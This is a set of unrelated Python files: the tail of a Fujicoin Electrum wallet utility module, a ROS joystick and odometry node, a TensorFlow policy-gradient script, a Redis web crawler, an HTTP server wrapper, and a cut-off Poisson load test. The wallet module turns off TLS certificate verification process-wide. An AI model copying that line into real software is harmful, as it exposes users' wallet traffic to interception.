if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(b):
global verbosity
verbosity = b
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum-fjc.electrum-fjc'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-fjc'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-fjc")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-FJC")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-FJC")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'fujicoin.org': ('https://explorer.fujicoin.org/',
{'tx': 'tx/', 'addr': 'address'}),
'cryptoID': ('https://chainz.cryptoid.info/',
{'tx': 'fjc/tx.dws?', 'addr': 'address'}),
'system default': ('https://chainz.cryptoid.info/',
{'tx': 'fjc/tx.dws?', 'addr': 'address'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'system default')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a fujicoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'fujicoin':
raise Exception("Not a fujicoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid fujicoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='fujicoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
|
parser_node.py | #!/usr/bin/env python
import rospy
import math as m
from communication.serial_handler import SerialThread
import json
from threading import Thread
from nav_msgs.msg import Odometry
from sensor_msgs.msg import Joy
from std_msgs.msg import Empty
from std_msgs.msg import String
global_data = ""
global_xbox_data = {}
global_odom_data = {}
pub = rospy.Publisher('/teensy/input', String, queue_size=1000)
"""
SERIAL_PORT = "/dev/ttyACM0"
SERIAL_BAUDRATE = 921600
SERIAL_INTERVAL = 0.02
serial = SerialThread(port=SERIAL_PORT, baudrate=SERIAL_BAUDRATE)
serial.connect()
print(serial.isConnected())
"""
def xbox_2_dict(data):
buttons = data.buttons
axes = data.axes
msg = {"0": axes[0], "1": axes[1], "2": axes[2], "3": axes[3], "4": axes[4], "5": axes[5],
"6": buttons[0], "7": buttons[1], "8": buttons[2], "9": buttons[3], "10": buttons[4],
"11": buttons[5], "12": buttons[6], "13": buttons[7], "14": buttons[8], "15": buttons[9],
"16": buttons[10]}
return msg
def odom_2_dict(data):
position = data.pose.pose.position
orientation = data.pose.pose.orientation
w = orientation.w
x = -orientation.x
y = orientation.y
z = -orientation.z
pitch = -m.asin(2.0 * (x*z - w*y)) * 180.0 / m.pi;
roll = m.atan2(2.0 * (w*x + y*z), w*w - x*x - y*y + z*z) * 180.0 / m.pi;
yaw = m.atan2(2.0 * (w*z + x*y), w*w + x*x - y*y - z*z) * 180.0 / m.pi;
msg = {"x": position.x, "y": position.y, "z": position.z, "pitch": pitch, "roll": roll, "yaw": yaw}
return msg
def callback0(data):
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data)
global global_odom_data
msg = odom_2_dict(data)
global_odom_data = msg
#print(msg)
def callback1(data):
#rospy.loginfo(rospy.get_caller_id() + "I heard %s", data)
global global_xbox_data
msg = xbox_2_dict(data)
global_xbox_data = msg
#print(msg)
def timer_callback(event):
global global_data, global_odom_data, global_xbox_data
global_data = {**global_odom_data, **global_xbox_data}
#data = str(global_data).replace("'", '"')
json_msg = json.dumps(global_data)
#serial.sendOutputStream(json.loads(json_msg))
data = json.loads(json_msg)
rospy.loginfo("%s", data)
pub.publish("Hello")
def listener():
rospy.init_node('listener', anonymous=True)
rospy.Subscriber("/camera/odom/sample", Odometry, callback0)
rospy.Subscriber("/joy", Joy, callback1)
timer = rospy.Timer(rospy.Duration(1.0), timer_callback)
rospy.spin()
timer.shutdown()
"""
def reader():
while True:
reply = serial.readInputStream()
print(reply)
read_thread = Thread(target=reader, daemon=True)
"""
if __name__ == '__main__':
#read_thread.start()
listener()
|
policy_gradient.py | import tensorflow as tf
import numpy as np
import os
import time
from shutil import move
from threading import Thread
from watcher import Watcher
from tensorflow.keras.callbacks import TensorBoard
LOGDIR = 'logs/tensorboard/'
class Environment(object):
def __init__(self, start_state, w):
self.w = w
self.start_state=start_state
self.reset()
def reset(self):
self.total_rewards = 0
self.state = self.start_state
return self.state
def step(self, action):
time.sleep(0.50)
if action == 1:
if self.state[2] == 1:
next_state = [self.w.get_nr_of_reads('fich1.txt'),
self.w.get_nr_of_reads('fich2.txt'),
2]
else:
next_state = [self.w.get_nr_of_reads('fich1.txt'),
self.w.get_nr_of_reads('fich2.txt'),
1]
else:
next_state = [self.w.get_nr_of_reads('fich1.txt'),
self.w.get_nr_of_reads('fich2.txt'),
self.state[2]]
if next_state[2] == 1 and next_state[0] > next_state[1]:
reward = 10
elif next_state[2] == 2 and next_state[1] > next_state[0]:
reward = 10
elif next_state[1] == next_state[0]:
reward = 0
else:
reward = -50
self.state = next_state
self.total_rewards += reward
return self.state, reward
def reset_graph(seed=42):
tf.reset_default_graph
tf.set_random_seed(seed)
np.random.seed(seed)
def discount_rewards(rewards, discount_rate):
discounted_rewards = np.zeros(len(rewards))
cumulative_rewards = 0
for step in reversed(range(len(rewards))):
cumulative_rewards = rewards[step] + cumulative_rewards * discount_rate
discounted_rewards[step] = cumulative_rewards
return discounted_rewards
def discount_and_normalize_rewards(all_rewards, discount_rate):
all_discounted_rewards = [discount_rewards(rewards, discount_rate) for rewards in all_rewards]
flat_rewards = np.concatenate(all_discounted_rewards)
reward_mean = flat_rewards.mean()
reward_std = flat_rewards.std()
return [(discounted_rewards - reward_mean)/reward_std for discounted_rewards in all_discounted_rewards]
def main():
w = Watcher('mops/mp1', 'mops/mp2')
thread1 = Thread(target = w.run )
thread1.start()
# To make the output stable across runs
reset_graph()
# [nr_file1, nr_file2, p_file1]
n_inputs = 3
n_hidden = 2
# whether it chooses to switch file positions
n_outputs = 1
learning_rate = 0.1
#Initializer capable of adapting its scale to the shape of weights tensors.
initializer = tf.variance_scaling_initializer()
# inserts a placeholder for a tensor that will be always fed
# Basicamente estamos a criar uma variavel que aceita n (None) entradas de tamanho igual
# ao n_inputs
X = tf.placeholder(tf.float32, shape=[None, n_inputs])
hidden = tf.layers.dense(X, n_hidden, activation=tf.nn.elu, kernel_initializer=initializer)
logits = tf.layers.dense(hidden, n_outputs)
outputs = tf.nn.sigmoid(logits) # probability of action 0 (not to migrate)
p_migrations = tf.concat(axis=1, values=[outputs, 1 - outputs])
action = tf.multinomial(tf.log(p_migrations), num_samples=1)
# tf.summary.scalar('action', action)
y = 1. - tf.to_float(action)
cross_entropy = tf.nn.sigmoid_cross_entropy_with_logits(labels=y, logits=logits)
# tf.summary.scalar([name1, name2], cross_entropy)
optimizer = tf.train.AdamOptimizer(learning_rate)
# correct_prediction = tf.equal(tf.argmax(logits,1), tf.argmax(y,1))
# accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
grads_and_vars = optimizer.compute_gradients(cross_entropy)
gradients = [grad for grad, variable in grads_and_vars]
tf.summary.histogram("gradients", gradients)
gradient_placeholders = []
grads_and_vars_feed = []
for grad, variable in grads_and_vars:
gradient_placeholder = tf.placeholder(tf.float32, shape=grad.get_shape())
gradient_placeholders.append(gradient_placeholder)
grads_and_vars_feed.append((gradient_placeholder, variable))
training_op = optimizer.apply_gradients(grads_and_vars_feed)
init = tf.global_variables_initializer()
saver = tf.train.Saver()
n_runs_per_update = 10
n_max_steps = 10
n_iterations = 20
save_iterations = 5
discount_rate = 0.95
env = Environment([w.get_nr_of_reads('fich1.txt'), w.get_nr_of_reads('fich2.txt'), 1], w)
# tf.reset_default_graph()
with tf.Session() as sess:
sess.run(init)
# merged_summary = tf.summary.merge_all()
writer = tf.summary.FileWriter(LOGDIR + "lr_0.2")
writer.add_graph(sess.graph)
# init.run()
for iteration in range(n_iterations):
print("=" * 79)
print("\rIteration: {}".format(iteration), end="")
all_rewards = []
all_gradients = []
for game in range(n_runs_per_update):
current_rewards = []
current_gradients = []
obs = env.reset()
print(obs)
for step in range(n_max_steps):
action_val, gradients_val = sess.run([action, gradients], feed_dict={X: np.asarray(obs).reshape(1, n_inputs)})
print("WOW")
print(action_val)
print("WOW")
print(action_val[0][0])
obs, reward = env.step(action_val[0][0])
print(obs)
current_rewards.append(reward)
current_gradients.append(gradients_val)
print(current_rewards)
all_rewards.append(current_rewards)
all_gradients.append(current_gradients)
w.reset()
all_rewards = discount_and_normalize_rewards(all_rewards, discount_rate=discount_rate)
feed_dict = {}
for var_index, gradient_placeholder in enumerate(gradient_placeholders):
mean_gradients = np.mean([reward * all_gradients[game_index][step][var_index] for game_index, rewards in enumerate(all_rewards) for step, reward in enumerate(rewards)], axis=0)
feed_dict[gradient_placeholder] = mean_gradients
sess.run(training_op, feed_dict=feed_dict)
writer.add_summary(gradients_val,iteration)
config = tf.contrib.tensorboard.plugins.projector.ProjectorConfig()
tf.contrib.tensorboard.plugins.projector.visualize_embeddings(writer, config)
if iteration % save_iterations == 0:
saver.save(sess, "./my_policy_net_pg.ckpt")
if __name__ == '__main__':
main() |
crawler.py | import requests
from lxml.html import fromstring
from redisqueue.scheduler import PipeScheduler
from concurrent.futures import ThreadPoolExecutor
import logging
import re
import importlib
import six
import time
from redisqueue import connection
class Crawler(PipeScheduler):
"""从redis-queue中获取url,进行爬取,然后再存放到另一个redis-queue中"""
def __init__(self, server,
persist=False,
flush_on_start=False,
queue_in_key='queue_in:%(timestamp)s' % {'timestamp': int(time.time())},
queue_in_cls='redisqueue.rqueues.FifoQueue',
queue_out_key='queue_out:%(timestamp)s' % {'timestamp': int(time.time())},
queue_out_cls='redisqueue.rqueues.FifoQueue',
idle_before_close=0,
serializer=None,
num_crawl_threads=10,
blacklist=r'',
whitelist=r'.*'):
"""Initialize scheduler.
Parameters
----------
blacklist : str
网页标题过滤黑名单
whitelist : str
网页标题过滤白名单
num_crawl_threads: int
同时爬取网页内容的线程数
"""
super().__init__(server, persist, flush_on_start, queue_in_key, queue_in_cls, queue_out_key, queue_out_cls, idle_before_close, serializer)
self.num_crawl_threads = num_crawl_threads
self.blacklist = re.compile(blacklist)
self.whitelist = re.compile(whitelist)
@classmethod
def from_settings(cls, settings):
kwargs = {
'persist': settings.get('SCHEDULER_PERSIST', True),
'flush_on_start': settings.get('SCHEDULER_FLUSH_ON_START', False),
'queue_in_key': settings.get('SCHEDULER_QUEUE_IN_KEY', 'queue_in:%(timestamp)s' % {'timestamp': int(time.time())}),
'queue_in_cls': settings.get('SCHEDULER_QUEUE_IN_CLASS', 'redisqueue.rqueues.FifoQueue'),
'queue_out_key': settings.get('SCHEDULER_QUEUE_OUT_KEY', 'queue_out:%(timestamp)s' % {'timestamp': int(time.time())}),
'queue_out_cls': settings.get('SCHEDULER_QUEUE_OUT_CLASS', 'redisqueue.rqueues.FifoQueue'),
'idle_before_close': settings.get('SCHEDULER_IDLE_BEFORE_CLOSE', 0),
'serializer': settings.get('SCHEDULER_SERIALIZER', None),
'num_crawl_threads': settings.get('NUM_CRAWL_THREADS', 10),
'blacklist': settings.get('BLACKLIST', r''),
'whitelist': settings.get('WHITELIST', r'.*')
}
# Support serializer as a path to a module.
if isinstance(kwargs.get('serializer'), six.string_types):
kwargs['serializer'] = importlib.import_module(kwargs['serializer'])
server = connection.from_settings(settings)
# Ensure the connection is working.
server.ping()
return cls(server=server, **kwargs)
def crawl_single(self, _):
"""
通过url爬取网页,获取title和content
"""
while True:
url = self.dequeue('in')
if url:
self.logger.info(f"crawl:{url}")
try:
r = requests.get(url, timeout=10)
if r.ok:
tree = fromstring(r.content)
title = tree.findtext('.//title')
if not self.blacklist.search(title).group() and self.whitelist.search(title).group():
result = {'url': url, 'title': title}
self.logger.info(f"produce:{url}")
self.enqueue(result)
else:
self.logger.info(f"filter:{url}")
else:
self.logger.info(f"discard:{url}")
except Exception as e:
self.logger.info(f"discard:{url}")
def crawl_bulk(self, n=0):
n = self.num_crawl_threads if not n else n
with ThreadPoolExecutor(n) as pool:
pool.map(self.crawl_single, range(n))
def main(settings):
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(name)s[line:%(lineno)d] %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S')
c = Crawler.from_settings(settings)
c.open()
# c.crawl_single(1)
c.crawl_bulk()
c.close()
if __name__ == "__main__":
from multiprocessing import Process
settings = {'REDIS_HOST': '127.0.0.1',
'REDIS_PORT': 6379,
'SCHEDULER_SERIALIZER': 'json',
'SCHEDULER_QUEUE_IN_KEY': 'digholes:queue_url_pool',
'SCHEDULER_QUEUE_IN_CLASS': 'redisqueue.rqueues.LifoQueue',
'SCHEDULER_QUEUE_OUT_KEY' : 'digholes:queue_response_pool'
}
p = Process(target=main, args=(settings,))
p.start()
p.join()
|
httpserver.py | import SimpleHTTPServer
import multiprocessing
import os
class HTTPServer(SimpleHTTPServer.BaseHTTPServer.HTTPServer):
def server_start(self, root_dir):
os.chdir(root_dir)
self.serve_forever()
class HTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def log_message(self, format_str, *args):
pass
class HTTPService(object):
def __init__(self, root_dir, host=''):
self.root_dir = root_dir
self.host = host
self.port = 0
def start(self):
self.server = HTTPServer((self.host, self.port), HTTPRequestHandler)
if self.port == 0:
self.port = self.server.server_port
self.process = multiprocessing.Process(target=self.server.server_start, args=[self.root_dir])
self.process.start()
def stop(self):
self.server.server_close()
self.process.terminate()
self.process.join()
|
poisson_tests_v0.py | import math, sys, threading, time, requests, random
from time import sleep
from dataclasses import dataclass
@dataclass
class ConnectivityServiceData:
start_TS: int = -1
inter_arrival_time: float = -0.1
end_TS: int = -1
type: str = ''
result: str = ''
uuid: str = ''
ber: bool = True
def millis():
return int(round(time.time() * 1000))
def poisson_wait_time(lmb):
p = random.random()
inter_arrival_time = -math.log(1.0 - p) / lmb
# print('inter_arrival_time: {}'.format(inter_arrival_time))
return inter_arrival_time
class Connectivity:
def __init__(self, lmb, connections):
self.log = []
self.start_time = -1
self.end_time = -1
self.total_holding_time = 0 # no l'entenc. borrar
self.endpoints = {'available': {
'cs_01': ['tx_node-nep_1', 'rx_node-nep_1'],
'cs_02': ['tx_node-nep_2', 'rx_node-nep_2'],
'cs_03': ['tx_node-nep_3', 'rx_node-nep_3'],
'cs_04': ['tx_node-nep_4', 'rx_node-nep_4']},
'occupied': {
}}
self.max_connections = connections
self.watcher_thread = threading.Thread(target=self.watcher_function, args=(lmb,))
self.first_conn = None
self.n_threads = 0
self.connection_no_ber = 0
def start(self):
print('Starting watcher')
self.watcher_thread.start()
def watcher_function(self, lmb):
n_connections = 0
self.start_time = millis()
while n_connections < self.max_connections:
s_next = poisson_wait_time(lmb)
time.sleep(s_next)
connection = ConnectivityServiceData(inter_arrival_time=s_next)
next_thread = threading.Thread(target=self.connectivity, args=(connection, ))
next_thread.start()
n_connections = n_connections + 1
self.exit_function()
def connectivity(self, connection):
connection.type = 'CREATE'
connection.start_TS = millis()
self.n_threads = self.n_threads + 1
try:
cs_uuid, endpoint = random.choice(list(self.endpoints['available'].items()))
del self.endpoints['available'][cs_uuid]
self.endpoints['occupied'][cs_uuid] = endpoint
except IndexError:
cs_uuid, endpoint = 'cs_error', ['a', 'b']
print('No EP available: {}'.format(cs_uuid))
connection.uuid = cs_uuid
src = endpoint[0]
dst = endpoint[1]
capacity = random.choice([100, 200])
url = "http://" + ip + "/restconf/config/context/connectivity-service/" + cs_uuid
# print(url)
print('SEND cs: {}'.format(cs_uuid))
response = requests.post(url, json={"uuid": cs_uuid, "src": src, "dst": dst, "capacity": capacity})
connection.end_TS = millis()
# print(response.status_code)
if response.status_code != 201: # ERROR CASE
print('Error cs: {} -> {}'.format(cs_uuid, response.json()['description']))
connection.result = response.json()['description']
self.log.append(connection)
del self.endpoints['occupied'][connection.uuid]
self.endpoints['available'][connection.uuid] = endpoint
self.n_threads = self.n_threads - 1
return 0
else: # SUCCESSFUL CASE
print('Successful cs: {}'.format(cs_uuid))
connection.result = response.json()['description']
self.log.append(connection)
s_next = poisson_wait_time(mu)
